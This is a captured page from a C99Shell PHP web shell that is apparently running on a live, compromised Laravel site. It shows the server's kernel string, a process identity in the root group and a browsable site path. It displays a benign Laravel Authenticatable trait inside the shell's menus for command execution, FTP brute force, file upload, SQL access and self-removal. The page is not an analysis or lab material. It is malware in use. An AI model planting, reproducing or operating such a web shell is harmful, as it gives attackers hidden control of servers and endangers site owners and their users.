!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/laravel/framework/src/Illuminate/Auth/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Authenticatable.php (2.12 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Auth;

trait 
Authenticatable
{
    
/**
     * The column name of the password field using during authentication.
     *
     * @var string
     */
    
protected $authPasswordName 'password';

    
/**
     * The column name of the "remember me" token.
     *
     * @var string
     */
    
protected $rememberTokenName 'remember_token';

    
/**
     * Get the name of the unique identifier for the user.
     *
     * @return string
     */
    
public function getAuthIdentifierName()
    {
        return 
$this->getKeyName();
    }

    
/**
     * Get the unique identifier for the user.
     *
     * @return mixed
     */
    
public function getAuthIdentifier()
    {
        return 
$this->{$this->getAuthIdentifierName()};
    }

    
/**
     * Get the unique broadcast identifier for the user.
     *
     * @return mixed
     */
    
public function getAuthIdentifierForBroadcasting()
    {
        return 
$this->getAuthIdentifier();
    }

    
/**
     * Get the name of the password attribute for the user.
     *
     * @return string
     */
    
public function getAuthPasswordName()
    {
        return 
$this->authPasswordName;
    }

    
/**
     * Get the password for the user.
     *
     * @return string
     */
    
public function getAuthPassword()
    {
        return 
$this->{$this->getAuthPasswordName()};
    }

    
/**
     * Get the token value for the "remember me" session.
     *
     * @return string|null
     */
    
public function getRememberToken()
    {
        if (! empty(
$this->getRememberTokenName())) {
            return (string) 
$this->{$this->getRememberTokenName()};
        }
    }

    
/**
     * Set the token value for the "remember me" session.
     *
     * @param  string  $value
     * @return void
     */
    
public function setRememberToken($value)
    {
        if (! empty(
$this->getRememberTokenName())) {
            
$this->{$this->getRememberTokenName()} = $value;
        }
    }

    
/**
     * Get the column name for the "remember me" token.
     *
     * @return string
     */
    
public function getRememberTokenName()
    {
        return 
$this->rememberTokenName;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--